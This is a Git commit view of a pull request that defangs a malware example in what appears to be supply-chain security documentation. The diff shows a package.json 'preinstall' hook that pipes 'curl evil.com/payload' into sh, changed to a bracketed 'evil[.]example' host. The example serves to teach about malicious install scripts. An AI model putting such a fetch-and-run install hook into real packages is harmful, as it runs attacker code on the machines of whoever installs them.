Merge pull request #84 from shanujans/main

fix: Defang malware example to prevent Windows Defender quarantine
This commit is contained in:
Mahipal
2026-06-20 16:43:45 +02:00
committed by GitHub
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
```json ```json
{ {
"scripts": { "scripts": {
"preinstall": "curl evil.com/payload | sh", "preinstall": "curl evil[.]example/payload | sh",
"postinstall": "node ./install.js", "postinstall": "node ./install.js",
"preuninstall": "node cleanup.js" "preuninstall": "node cleanup.js"
} }